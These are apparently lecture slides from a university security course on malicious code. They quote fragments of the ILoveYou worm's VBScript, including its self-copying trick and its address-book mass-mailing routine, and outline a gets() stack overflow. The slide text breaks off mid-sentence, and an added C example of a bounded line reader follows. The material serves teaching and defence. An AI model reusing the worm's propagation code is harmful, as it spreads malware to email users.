UVA CS 588 - Lecture 20: Malicious Code
Contents (slide titles): Menu; LoveLetter.VBS; Main Loop; spreadtoemail (edited to fit); Slide 6; Be Very Afraid...; Attacking Malicious Code; Taxonomy of Code; Taxonomy of Malcode [Stallings, p. 502]; Worms and Viruses; Trojan Horses; Modern Trojan Horses; Differences between Morris Worm 1988 and Melissa/ILoveYou 1999; Vulnerabilities Exploited; Buffer Overflows; Preventing Buffer Overflows; Replication Strategy; Damage; Outcomes; Responses; Malcode Defenses; Slide 23; Virus Scanners; Slide 25; Virus Spreading; Code Red; Slide 28; What Virus Scanner Peddlers Do (2001); Slide 30; Always Click "Yes"; Slide 32; What Virus Scanner Peddlers Do (Today); Slide 34; What it Should Do; Slide 36; The Best Firewall; Lesser Firewall; Networks – OSI Model; An IP (V4) Packet; A Simple Packet Filter; Typical Packet Filtering Rules; Packet Filter Layers; Application-Layer Gateways; Malcode on the Near Horizon; Malcode Summary; Charge.

Lecture 20: Malicious Code
David Evans, http://www.cs.virginia.edu/evans
CS588: Cryptography, University of Virginia, Computer Science
21 April 2005

Menu
•Examination of ILoveYou Code
•Malicious Code Taxonomy
•Malcode Defenses Overview
–Virus Scanners

LoveLetter.VBS
•This 328-line program caused ~$10B in damage
•How much work and smarts was required?

Main Loop
    rem barok -loveletter(vbe) <i hate go to school>
    rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    ...
    wscr.RegWrite "...Scripting Host\Settings\Timeout", 0
    sub main()
    ...
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    ...
    spreadtoemail()
    ...
    end sub
Annotations on the slide:
–Smart virus writers don't include their contact information.
–Smart people would convey a more interesting message.
–This was smart: turn off the scripting timeout in the registry. (Dumb for Microsoft.)
–The copy gives the script a double extension (.TXT.vbs), so a file viewer that hides known extensions shows a harmless-looking .TXT.

spreadtoemail (edited to fit)
    sub spreadtoemail()
      for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        for ctrentries=1 to a.AddressEntries.Count
          malead=a.AddressEntries(x)
          set male=out.CreateItem(0)
          male.Recipients.Add(malead)
          male.Subject = "ILOVEYOU"
          male.Body = "kindly check the attached LOVELETTER coming from me."
          male.Attachments.Add(dirsystem& "\LOVE-LETTER-FOR-YOU.TXT.vbs")
          male.Send
          x=x+1
        next
      next
    end sub
Annotations on the slide:
–Smart virus writers understand for loops.
–Smart virus writers can spell "mail".

Be Very Afraid...
•When really dumb people with no resources write malicious programs, it costs $10B.
•What would happen if smart people with resources wrote a malicious program?
–Paper: Staniford, Paxson & Weaver, How to 0wn the Internet in Your Spare Time (2002)
•"Warhol worm": 15 minutes to 0wn the Internet

Attacking Malicious Code
•"Malicious Code" is a bad name
–Code has no intent
–The programmer's intent doesn't matter; what the code does matters
•As networks get more programmable, accidentally harmful code will become common
•We'll use "malcode" (mal = bad)
–It's not a great name either...

Taxonomy of Code
    All Code
      Harmless Code
      Malcode
        Created by Malicious Author
        Accidental
    (occasionally programs are actually useful, too)

Taxonomy of Malcode [Stallings, p. 502]
    Malcode
      Requires Host Program: Trap Doors, Logic Bombs, Trojan Horses, Viruses
      Independent: Worms, Insiders
    Self-Replicating: Viruses, Worms

Worms and Viruses
•People get into stupid arguments over whether something is a "worm" or a "virus"
–Is the Internet a host program?
•See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988
–Is Outlook a host program for an email?
•Similarly, for worms/viruses/Trojans
–If the user must open it (e.g., ILoveYou), is it self-replicating?

Trojan Horses
•Greeks and Trojans at war
–Eris (Discord), Paris, Aphrodite, Helen
•Greeks attacking Troy bombarded the city for 10 years, but couldn't get through the city walls.
•Pretended to leave, left a big wooden horse as a gift
•Trojans brought the horse into the city (had to tear down part of the wall to do this), got silly drunk celebrating victory.
•Greeks jumped out, killed the sentries, and let in the Greek army.

Modern Trojan Horses
•User runs a program that looks harmless
–Program pretends to be "cool, dancing bears", also erases your hard drive
•Most attacks today are Trojan Horses
–ILoveYou, Melissa, recent Microsoft attack, etc.
•Rely on modern humans being as dumb as mythical Trojans
–No matter how good your city/fire walls are, they don't do any good if you can't stop users from running random code

Differences between Morris Worm 1988 and Melissa/ILoveYou 1999

Vulnerabilities Exploited
•Morris Worm:
–Buffer overflow: fingerd uses gets
–sendmail debug mode
–Weak Unix passwords
•Melissa:
–Word enables macros by default, no limitations on macro behavior
•ILoveYou:
–Dumb people will run code attached to email
•Code Red/Nimda:
–Buffer overflow in IIS

Buffer Overflows
Stack frame (schematic; the exact placement of the saved frame pointer and return address relative to the locals depends on the compiler):
    Return Address
    Frame Pointer
    char s[64];
    ...
    int i;
    int k;
Code:
    char s[64];
    ...
    int i;
    gets (s);
•Input more than 64 bytes: gets has no length bound and just keeps writing through the rest of the frame
–byte 65: address of byte 66 on the stack (overwrites the saved return address)
–bytes 66-...: instructions (the shellcode the overwritten return address now points at)

Preventing Buffer Overflows
•Use run-time checks on all memory references
–Safe languages (CLU, Java, Eiffel, etc.)
–Safe libraries for C (don't use gets, strcpy, etc.)
•Obfuscation
–Randomize locations in memory
•Separate code and data segments
–Make code segment unwriteable (once application loaded), only allow jumps in code segment
•Static analysis
–Check binary or source code
•But – about ½ of recent vulnerabilities are still buffer overflows!

Replication Strategy
•Morris Worm
–Searched .forward files (should have used .rhosts) to find other hosts to attack
–Used password guessing to break into other accounts
–Used fingerd, sendmail vulnerabilities
•Melissa/ILoveYou
–Emails itself to
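Worked example for the Buffer Overflows and Preventing Buffer Overflows slides. This is added code, not from the lecture: it shows the slide's gets(s) idiom next to the "safe library" replacement the slide recommends, a bounded line reader built on fgets. The names overflow_bytes, read_line_bounded and read_matches, and the 100-byte attacker line, are my own constructions. The bounded reader also handles the failure mode fgets introduces on its own: when a line is longer than the buffer, fgets leaves the tail of that line in the stream, so a naive replacement hands attacker-controlled leftover bytes to the next read as if they were a fresh record.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64   /* same size as the slide's char s[64] */

/* The slide's defect, for reference only (never called here):
 *
 *     char s[64];
 *     gets(s);      -- gets() takes no length, so an input of 64 or more
 *                      characters plus the NUL keeps writing past s into
 *                      i, the saved frame pointer and the return address.
 *
 * C11 removed gets() from the standard library for exactly this reason. */

/* How many bytes a gets()-style unbounded copy of one line of `input`
 * (characters up to the newline, plus the NUL terminator) would write
 * beyond a buffer of `buflen` bytes. 0 means the line fits. */
size_t overflow_bytes(size_t buflen, const char *input)
{
    size_t needed = strcspn(input, "\n") + 1;
    return needed > buflen ? needed - buflen : 0;
}

/* Bounded replacement for gets(s): reads one line into buf[len].
 * Returns 1 for a complete line, 2 if the line was longer than the buffer
 * (first len-1 bytes kept, rest of the line discarded), 0 on EOF with
 * nothing read. The trailing newline is stripped. */
int read_line_bounded(FILE *in, char *buf, size_t len)
{
    if (len == 0) return 0;
    if (fgets(buf, (int)len, in) == NULL) {
        buf[0] = '\0';
        return 0;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    /* No newline in buf: the line ended at EOF, fit exactly, or was cut. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return 1;
    /* Overlong line: drain the remainder so the next read does not return
     * attacker-controlled leftover bytes as a new record. */
    while (c != '\n' && c != EOF) c = fgetc(in);
    return 2;
}

/* Harness: feeds a constructed input through a standard tmpfile(), reads
 * `skip` lines and then one more, and returns that read's status if the
 * line equals `expected`, or -1 if it does not. */
int read_matches(const char *input, size_t len, int skip, const char *expected)
{
    char buf[BUF_LEN];
    int status;
    if (len > sizeof buf) return -2;
    FILE *f = tmpfile();
    if (f == NULL) return -3;
    fputs(input, f);
    rewind(f);
    do {
        status = read_line_bounded(f, buf, len);
    } while (skip-- > 0);
    fclose(f);
    return strcmp(buf, expected) == 0 ? status : -1;
}

int main(void)
{
    /* Constructed attacker line: 100 'A's, far more than s[64] can hold. */
    char attack[102];
    memset(attack, 'A', 100);
    attack[100] = '\n';
    attack[101] = '\0';

    printf("gets() would write %zu bytes past s[%d]\n",
           overflow_bytes(BUF_LEN, attack), BUF_LEN);

    char s[BUF_LEN];
    FILE *f = tmpfile();
    if (f == NULL) return 1;
    fputs(attack, f);
    rewind(f);
    int status = read_line_bounded(f, s, sizeof s);
    fclose(f);
    printf("bounded read: status %d, kept %zu bytes, frame intact\n",
           status, strlen(s));
    return 0;
}
```

The status code matters: a caller that silently accepts a truncated line has traded memory corruption for a logic bug (a truncated command or path), so treat status 2 as an input error rather than a success. Note that the bounded reader only closes this one hole; the slide's other defenses (address randomization, non-writable code segments, static analysis) are still needed against the overflows you did not find.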